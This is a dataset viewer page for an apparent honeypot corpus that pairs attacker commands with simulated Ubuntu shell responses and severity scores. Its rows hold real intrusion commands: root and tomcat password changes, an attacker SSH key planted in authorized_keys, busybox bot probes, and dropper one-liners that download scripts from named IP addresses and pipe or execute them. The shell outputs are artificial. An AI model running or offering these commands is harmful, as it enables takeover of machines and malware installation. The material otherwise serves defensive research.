Dataset Viewer
Auto-converted to Parquet Duplicate
session_id
stringclasses
160 values
period
stringclasses
1 value
turn_index
int64
0
351
command
stringlengths
1
1.77k
response
stringlengths
12
6.81k
system_change
stringlengths
4
2.61k
severity_vi
int64
0
4
response_source
stringclasses
1 value
3cfda146101c
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
1
echo -e "tomcat\nbjRKjrNdKYjq\nbjRKjrNdKYjq"|passwd|bash
root@ubuntu:# echo -e "tomcat\nbjRKjrNdKYjq\nbjRKjrNdKYjq"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'tomcat' has been changed to 'bjRKjrNdKYjq'.
4
curated_ubuntu
3cfda146101c
2021_2022
2
echo "tomcat\nbjRKjrNdKYjq\nbjRKjrNdKYjq\n"|passwd
root@ubuntu:~# echo "tomcat\nbjRKjrNdKYjq\nbjRKjrNdKYjq\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'tomcat' has been changed to 'bjRKjrNdKYjq'.
4
curated_ubuntu
3cfda146101c
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 567890 234567 345678 456789 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
8
w
root@ubuntu:~# w 14:12:08 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 12:12 2:00 0.03s 0.03s -bash root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
11
top
root@ubuntu:~# top top - 14:12:08 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 725938364 total, 725938364 free, 0 used, 0 buff/cache MiB Sw...
None
0
curated_ubuntu
3cfda146101c
2021_2022
12
uname
root@ubuntu:~# uname Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
13
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
14
lscpu | grep Model
root@ubuntu:~# lscpu | grep Model Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
3cfda146101c
2021_2022
15
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5...
root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0...
The '.ssh' directory in the home directory was deleted and recreated. A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory. The permissions of the '.ssh' directory were changed to be accessible only by the owner.
4
curated_ubuntu
adc6049a7c57
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
1
echo "root:YwHj17IRAbQh"|chpasswd|bash
root@ubuntu:~# echo "root:YwHj17IRAbQh"|chpasswd|bash root@ubuntu:~#
The password for the root user has been changed to 'YwHj17IRAbQh'.
4
curated_ubuntu
adc6049a7c57
2021_2022
2
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
3
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
4
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
5
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
6
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
7
w
root@ubuntu:~# w 14:18:44 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 12:18 2.00s 0.03s 0.00s w root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
8
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
9
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
10
top
root@ubuntu:~# top top - 14:19:59 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 725938364 total, 123456 free, 234567 used, 345678 buff/cache MiB Swap: ...
None
0
curated_ubuntu
adc6049a7c57
2021_2022
11
uname
root@ubuntu:~# uname Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
12
uname -a
root@ubuntu:~# uname -a Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
13
lscpu | grep Model
root@ubuntu:~# lscpu | grep Model Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
adc6049a7c57
2021_2022
14
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5...
root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0...
The '.ssh' directory in the home directory was deleted and recreated. A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory. The permissions of the '.ssh' directory were changed to remove group and other permissions.
4
curated_ubuntu
e6f97a3576d4
2021_2022
0
enable
root@ubuntu:~# enable root@ubuntu:~#
The 'enable' command was executed, but it does not cause any changes to the system as it is a built-in shell command used to enable and disable shell builtins.
0
curated_ubuntu
e6f97a3576d4
2021_2022
1
system
root@ubuntu:~# system bash: system: command not found root@ubuntu:~#
The 'system' command was attempted, but it is not a recognized command in the bash shell on this system. Therefore, no changes were made to the system.
0
curated_ubuntu
e6f97a3576d4
2021_2022
2
shell
root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~#
The 'shell' command was attempted, but it is not a recognized command in the bash shell on this system. Therefore, no changes were made to the system.
0
curated_ubuntu
e6f97a3576d4
2021_2022
3
sh
root@ubuntu:~# sh #
The shell has been changed to 'sh' from 'bash'.
2
curated_ubuntu
e6f97a3576d4
2021_2022
4
cat /proc/mounts; /bin/busybox NDNYN
# cat /proc/mounts sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=2041895,mode=755 0 0 devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,nosuid,noexec,...
None
0
curated_ubuntu
e6f97a3576d4
2021_2022
5
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox NDNYN
# cd /dev/shm # cat .s || cp /bin/echo .s # /bin/busybox NDNYN #
The working directory was changed to '/dev/shm'. If the file '.s' did not exist in the '/dev/shm' directory, a copy of '/bin/echo' was created with the name '.s'.
2
curated_ubuntu
e6f97a3576d4
2021_2022
6
tftp; wget; /bin/busybox NDNYN
# tftp BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file # wget BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary. Usage: wget [-c|--continue] [--spid...
The 'tftp', 'wget', and '/bin/busybox NDNYN' commands were executed, but they did not cause any changes to the system as they were not provided with the necessary arguments to perform any action.
0
curated_ubuntu
e6f97a3576d4
2021_2022
7
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
# dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s 1+0 records in 1+0 records out 52 bytes copied, 0.000123456 s, 421 MB/s #
The 'dd' command was used to read 52 bytes from the file '.s' in the '/dev/shm' directory. If the 'dd' command failed, the 'cat' command would have been used to display the contents of the file '.s'. If the 'cat' command also failed, a 'while' loop would have been used to read the file '.s' line by line and echo each l...
0
curated_ubuntu
e6f97a3576d4
2021_2022
8
/bin/busybox NDNYN
# /bin/busybox NDNYN #
The '/bin/busybox NDNYN' command was executed, but it did not cause any changes to the system as 'NDNYN' is not a recognized BusyBox command.
0
curated_ubuntu
e6f97a3576d4
2021_2022
9
rm .s; exit
# rm .s # exit exit root@ubuntu:~#
The file '.s' in the '/dev/shm' directory was removed. The shell was exited, returning to the previous shell.
4
curated_ubuntu
11bffebda924
2021_2022
0
echo -e '\x67\x61\x79\x66\x67\x74'
root@ubuntu:~# echo -e '\x67\x61\x79\x66\x67\x74' gayfgt root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
11bffebda924
2021_2022
1
echo -e '\x67\x61\x79\x66\x67\x74'
root@ubuntu:~# echo -e '\x67\x61\x79\x66\x67\x74' gayfgt root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
e86d790149b7
2021_2022
0
cat /proc/uptime
root@ubuntu:~# cat /proc/uptime 12345.67 89012.34 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
1a73f23f1aa4
2021_2022
0
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/8UsA.sh; curl -O http://209.141.43.118/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 209.141.43.118 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 209.141.43.118; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anon...
root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd / root@tmp:~# wget http://209.141.43.118/8UsA.sh --2023-10-30 13:05:42-- http://209.141.43.118/8UsA.sh Connecting to 209.141.43.118:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘8UsA.sh’ 100%...
- The terminal changed the working directory to '/tmp'. - Four shell scripts were downloaded from the server with IP '209.141.43.118' using different methods (wget, curl, tftp, ftpget). - The downloaded scripts were given full permissions and executed. - All scripts and all files in the '/tmp' directory were removed.
4
curated_ubuntu
c4e01b14b112
2021_2022
0
enable
root@ubuntu:~# enable root@ubuntu:~#
The 'enable' command was executed, but it doesn't change anything in the system as it is used to enable and disable builtin shell commands.
0
curated_ubuntu
c4e01b14b112
2021_2022
1
system
root@ubuntu:~# system bash: system: command not found root@ubuntu:~#
The 'system' command was attempted, but it is not a recognized command in this Linux environment.
0
curated_ubuntu
c4e01b14b112
2021_2022
2
shell
root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~#
The 'shell' command was attempted, but it is not a recognized command in this Linux environment.
0
curated_ubuntu
c4e01b14b112
2021_2022
3
sh
root@ubuntu:~# sh #
The shell has been changed to 'sh' from 'bash'.
2
curated_ubuntu
c4e01b14b112
2021_2022
4
linuxshell
# linuxshell sh: linuxshell: not found #
The 'linuxshell' command was attempted, but it is not a recognized command in this Linux environment.
0
curated_ubuntu
c4e01b14b112
2021_2022
5
/bin/busybox TSUNAMI
# /bin/busybox TSUNAMI sh: /bin/busybox: not found #
The command '/bin/busybox TSUNAMI' was attempted, but '/bin/busybox' does not exist in this Linux environment.
0
curated_ubuntu
c4e01b14b112
2021_2022
6
/bin/busybox cat /bin/busybox
# /bin/busybox cat /bin/busybox sh: /bin/busybox: not found #
The command '/bin/busybox cat /bin/busybox' was attempted, but '/bin/busybox' does not exist in this Linux environment.
0
curated_ubuntu
4e2abef99f34
2021_2022
0
echo -e "\x6F\x6B"
root@ubuntu:~# echo -e "\x6F\x6B" ok root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
cf806295641c
2021_2022
0
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 ....
root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd / root@tmp:~# wget http://209.141.43.118/sh --2023-10-31 14:32:03-- http://209.141.43.118/sh Connecting to 209.141.43.118:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘sh’ 100%[==============...
- The terminal changed the working directory to '/tmp'. - Three shell scripts were downloaded from the server with IP '209.141.43.118' using different methods (wget, curl, tftp, ftpget). - The downloaded scripts were given full permissions and executed. - All scripts and all files in the '/tmp' directory were removed.
4
curated_ubuntu
6b124b77a070
2021_2022
0
sh
root@ubuntu:~# sh sh-4.4#
The shell has been changed to 'sh'.
2
curated_ubuntu
6b124b77a070
2021_2022
1
enable
sh-4.4# enable sh-4.4#
The 'enable' command was executed, but it does not cause any changes in the 'sh' shell.
0
curated_ubuntu
6b124b77a070
2021_2022
2
shell
sh-4.4# shell sh-4.4#
The 'shell' command was executed, but it does not cause any changes in the 'sh' shell.
0
curated_ubuntu
6b124b77a070
2021_2022
3
debug shell
sh-4.4# debug shell sh-4.4#
The 'debug shell' command was executed, but it does not cause any changes in the 'sh' shell.
0
curated_ubuntu
6b124b77a070
2021_2022
4
cmd
sh-4.4# cmd sh: cmd: command not found sh-4.4#
The 'cmd' command was executed, but it is not recognized in the 'sh' shell. No changes were made to the system.
0
curated_ubuntu
6b124b77a070
2021_2022
5
wget http://2.58.149.116/w -O- | sh; curl http://2.58.149.116/c -O- | sh
sh-4.4# wget http://2.58.149.116/w -O- | sh --2023-11-27 22:01:14-- http://2.58.149.116/w Connecting to 2.58.149.116:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘STDOUT’ - 100%[===================>] 28 --.-KB/s in 0s 2023-1...
Two shell scripts were downloaded from the server with IP '2.58.149.116' using wget and curl, and then executed. The content of both scripts is the string 'date'.
3
curated_ubuntu
ecbf2319a592
2021_2022
0
>/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/tmp#
The working directory was changed to '/tmp'. An empty file named '.l' was created in the '/tmp' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
1
>/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var#
The working directory was changed to '/var'. An empty file named '.l' was created in the '/var' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
2
>/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev#
The working directory was changed to '/dev'. An empty file named '.l' was created in the '/dev' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
3
>/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/mnt#
The working directory was changed to '/mnt'. An empty file named '.l' was created in the '/mnt' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
4
>/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/run#
The working directory was changed to '/var/run'. An empty file named '.l' was created in the '/var/run' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
5
>/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/tmp#
The working directory was changed to '/var/tmp'. An empty file named '.l' was created in the '/var/tmp' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
6
>/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/#
The working directory was changed to '/'. An empty file named '.l' was created in the '/' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
7
>/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/netslink#
The working directory was changed to '/dev/netslink'. An empty file named '.l' was created in the '/dev/netslink' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
8
>/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/shm#
The working directory was changed to '/dev/shm'. An empty file named '.l' was created in the '/dev/shm' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
9
>/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/bin#
The working directory was changed to '/bin'. An empty file named '.l' was created in the '/bin' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
10
>/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/etc#
The working directory was changed to '/etc'. An empty file named '.l' was created in the '/etc' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
11
>/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/boot#
The working directory was changed to '/boot'. An empty file named '.l' was created in the '/boot' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
12
>/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/usr#
The working directory was changed to '/usr'. An empty file named '.l' was created in the '/usr' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
13
>/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/sys#
The working directory was changed to '/sys'. An empty file named '.l' was created in the '/sys' directory. The string 'PATH_DONE' was printed to the terminal.
2
curated_ubuntu
ecbf2319a592
2021_2022
14
wget --help >/dev/null && echo -e '\x57\x47\x45\x54\x5f\x46\x4f\x55\x4e\x44';curl --help >/dev/null && echo -e '\x43\x55\x52\x4c\x5f\x46\x4f\x55\x4e\x44';ftpget --help >/dev/null && echo -e '\x46\x54\x50\x5f\x46\x4f\x55\x4e\x44'; echo -e '\x45\x43\x48\x4f\x5f\x46\x4f\x55\x4e\x44'
root@ubuntu:/sys# wget --help >/dev/null && echo -e '\x57\x47\x45\x54\x5f\x46\x4f\x55\x4e\x44';curl --help >/dev/null && echo -e '\x43\x55\x52\x4c\x5f\x46\x4f\x55\x4e\x44';ftpget --help >/dev/null && echo -e '\x46\x54\x50\x5f\x46\x4f\x55\x4e\x44'; echo -e '\x45\x43\x48\x4f\x5f\x46\x4f\x55\x4e\x44' WGET_FOUND CURL_FOUND...
No changes to the system were made. The commands were used to check the availability of 'wget', 'curl', 'ftpget', and 'echo' on the system.
0
curated_ubuntu
ecbf2319a592
2021_2022
15
wget http://2.58.149.116/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc
root@ubuntu:/sys# wget http://2.58.149.116/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc --2023-10-31 14:46:16-- http://2.58.149.116/spc Connecting to 2.58.149.116:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘STDOUT’ - ...
A file named 'ntpclient' was downloaded from 'http://2.58.149.116/spc', given full permissions, and executed with the argument 'test.wget.spc'.
3
curated_ubuntu
eb06648a0e7c
2021_2022
0
>/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/tmp#
The terminal created a new file named '.l' in the '/tmp' directory and changed the working directory to '/tmp'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
1
>/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var#
The terminal created a new file named '.l' in the '/var' directory and changed the working directory to '/var'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
2
>/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev#
The terminal created a new file named '.l' in the '/dev' directory and changed the working directory to '/dev'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
3
>/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/mnt#
The terminal created a new file named '.l' in the '/mnt' directory and changed the working directory to '/mnt'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
4
>/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/run#
The terminal created a new file named '.l' in the '/var/run' directory and changed the working directory to '/var/run'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
5
